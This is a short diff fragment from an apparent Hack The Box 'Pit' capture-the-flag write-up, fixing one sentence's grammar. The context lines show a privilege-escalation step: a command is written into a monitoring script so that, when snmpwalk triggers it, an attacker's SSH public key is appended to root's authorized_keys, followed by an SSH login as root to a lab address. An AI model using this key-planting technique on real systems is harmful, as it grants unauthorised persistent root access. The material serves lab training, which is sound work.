Kyuu-Ji/htb-write-up/pit/write-up-pit.md

 echo 'echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABg(...) >> /root/.ssh/authorized_keys' > /usr/local/monitoring/check1.sh
 ```

-After running the `snmpwalk` again, the command will be executed and add the SSH key into _.ssh/authorized_keys_ file of root and it is possible to login as root!
+After running the `snmpwalk` again, the command will be executed and add the SSH key into the _.ssh/authorized_keys_ file of root and it is possible to login as root!
 ```
 ssh -i pit root@10.10.10.241
 ```